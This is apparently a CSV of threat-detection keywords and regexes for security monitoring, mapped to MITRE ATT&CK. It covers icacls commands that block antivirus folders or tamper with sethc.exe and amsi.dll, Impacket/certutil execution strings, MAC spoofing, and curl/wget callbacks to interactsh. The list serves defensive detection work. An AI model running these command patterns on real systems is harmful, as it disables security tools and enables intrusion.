"*icacls *\Kaspersky Lab* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Kaspersky\sLab.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Malwarebytes* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Malwarebytes.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Malwarebytes* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Malwarebytes.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\McAfee* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\McAfee.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Norton* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Norton.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Panda Security* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Panda\sSecurity.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\SpyHunter* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\SpyHunter.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\SpyHunter* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\SpyHunter.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls c:\windows\system32\sethc.exe *",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe\s.{0,1000}","greyware_tool_keyword","icalcs","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*",".{0,1000}icacls\.exe\sC\:\\Windows\\System32\\amsi\.dll\s\/grant\sadministrators\:F.{0,1000}","greyware_tool_keyword","icalcs","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*ifconfig * hw ether *",".{0,1000}ifconfig\s.{0,1000}\shw\sether\s.{0,1000}","greyware_tool_keyword","ifconfig","change mac address with ifconfig","T1027","TA0002","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*ifconfig * hw ether *:*:*",".{0,1000}ifconfig\s.{0,1000}\shw\sether\s.{0,1000}\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","ifconfig","changing mac address with ifconfig","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*cmd.exe /Q /c dir 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z"
"*cmd.exe /Q /c hostname 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z"
"*cmd.exe /Q /c hostname 1> * 2>&1 && certutil -encodehex *",".{0,1000}cmd\.exe\s\/Q\s\/c\shostname\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z"
"*cmd.exe /Q /c ipconfig 1> * 2>&1 && certutil -encodehex *     ",".{0,1000}cmd\.exe\s\/Q\s\/c\sipconfig\s1\>\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s.{0,1000}\s\s\s\s\s","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z"
"*cmd.exe /Q /c ipconfig 1> \Windows\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sipconfig\s1\>\s\\Windows\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","greyware_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","subject to false positive (not only impacket)","10","10","13227","3529","2024-08-29T14:58:22Z","2015-04-15T14:04:07Z"
"*ookhnhpkphagefgdiemllfajmkdkcaim*",".{0,1000}ookhnhpkphagefgdiemllfajmkdkcaim.{0,1000}","greyware_tool_keyword","iNinja VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*.exec*.interact.sh*",".{0,1000}\.exec.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*.interactsh.com",".{0,1000}\.interactsh\.com","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*/interactsh/*",".{0,1000}\/interactsh\/.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*/interactsh-client*",".{0,1000}\/interactsh\-client.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*/interactsh-collaborator*",".{0,1000}\/interactsh\-collaborator.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*/interactsh-server*",".{0,1000}\/interactsh\-server.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*curl*.interact.sh*",".{0,1000}curl.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*http://*.interact.sh*",".{0,1000}http\:\/\/.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*interactsh -*",".{0,1000}interactsh\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*interactsh*.exe",".{0,1000}interactsh.{0,1000}\.exe","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*interactsh*oast.*",".{0,1000}interactsh.{0,1000}oast\..{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*interactsh-client -*",".{0,1000}interactsh\-client\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*interactsh-server -*",".{0,1000}interactsh\-server\s\-.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*projectdiscovery/interactsh*",".{0,1000}projectdiscovery\/interactsh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*wget*.interact.sh*",".{0,1000}wget.{0,1000}\.interact\.sh.{0,1000}","greyware_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","N/A","FP risk - legitimate service abused by attackers","10","10","3290","350","2024-08-29T13:44:31Z","2021-01-29T14:31:51Z"
"*/Invoke-Maldaptive.git*",".{0,1000}\/Invoke\-Maldaptive\.git.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*\Invoke-Maldaptive-main*",".{0,1000}\\Invoke\-Maldaptive\-main.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*\Obfuscated_Command.txt*",".{0,1000}\\Obfuscated_Command\.txt.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*275de3390b20723991268204fb3f70b0ec76dba29f809ac0152588cecc22e87f*",".{0,1000}275de3390b20723991268204fb3f70b0ec76dba29f809ac0152588cecc22e87f.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*50c178847f0454a84f85bc765699c1180ea1b49f91e7d70b5b9113845d008387*",".{0,1000}50c178847f0454a84f85bc765699c1180ea1b49f91e7d70b5b9113845d008387.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*7215255a842142ffa7f7e1624942684279e9a2f14fa7947451a3194d0b608f52*",".{0,1000}7215255a842142ffa7f7e1624942684279e9a2f14fa7947451a3194d0b608f52.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*db015ab1-abcd-1234-5678-133337c0ffee*",".{0,1000}db015ab1\-abcd\-1234\-5678\-133337c0ffee.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#GUIDproject","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Disable-LdapClientWinEvent -ProcessName *",".{0,1000}Disable\-LdapClientWinEvent\s\-ProcessName\s.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*e8f71ea9428bb466651b9cd3a2ed3a726d1a07712bd611330def1ebfcbc68b47*",".{0,1000}e8f71ea9428bb466651b9cd3a2ed3a726d1a07712bd611330def1ebfcbc68b47.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","#filehash","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*https://github.com/mandiant/SilkETW/releases/download/v0.8/SilkETW_SilkService_v8.zip*",".{0,1000}https\:\/\/github\.com\/mandiant\/SilkETW\/releases\/download\/v0\.8\/SilkETW_SilkService_v8\.zip.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Invoke-LdapBranchVisitor*",".{0,1000}Invoke\-LdapBranchVisitor.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Invoke-LdapQuery -*ConvertFrom-LdapSearchResult*",".{0,1000}Invoke\-LdapQuery\s\-.{0,1000}ConvertFrom\-LdapSearchResult.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Invoke-Maldaptive*",".{0,1000}Invoke\-Maldaptive.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection*",".{0,1000}MaLDAPtive\sis\sa\sframework\sfor\sLDAP\sSearchFilter\sparsing,\sobfuscation,\sdeobfuscation\sand\sdetection.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Maldaptive.pd1*",".{0,1000}Maldaptive\.pd1.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*Maldaptive.psm1*",".{0,1000}Maldaptive\.psm1.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*MaLDAPtive/Invoke-Maldaptive*",".{0,1000}MaLDAPtive\/Invoke\-Maldaptive.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","1","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*New-ObfuscationContainer -SearchFilter $SearchFilter -SearchRoot:$SearchRoot -AttributeList*",".{0,1000}New\-ObfuscationContainer\s\-SearchFilter\s\$SearchFilter\s\-SearchRoot\:\$SearchRoot\s\-AttributeList.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"*serviceName = 'SilkService*",".{0,1000}serviceName\s\=\s\'SilkService.{0,1000}","greyware_tool_keyword","Invoke-Maldaptive","MaLDAPtive is a framework for LDAP SearchFilter parsing - obfuscation - deobfuscation and detection.","T1027","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/MaLDAPtive/Invoke-Maldaptive","1","0","N/A","N/A","7","2","129","10","2024-08-07T21:12:45Z","2024-08-07T20:43:52Z"
"* IObitUnlocker.exe*",".{0,1000}\sIObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","0","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*/IObitUnlocker.exe*",".{0,1000}\/IObitUnlocker\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
"*/unlocker-setup.exe*",".{0,1000}\/unlocker\-setup\.exe.{0,1000}","greyware_tool_keyword","IObitUnlocker","unlocking locked files on Windows systems","T1222 - T1070 - T1485","TA0005 - TA0040","N/A","PLAY","Defense Evasion","https://www.iobit.com/en/iobit-unlocker.php#","1","1","N/A","often used legitimatly - admin tool","5","9","N/A","N/A","N/A","N/A"
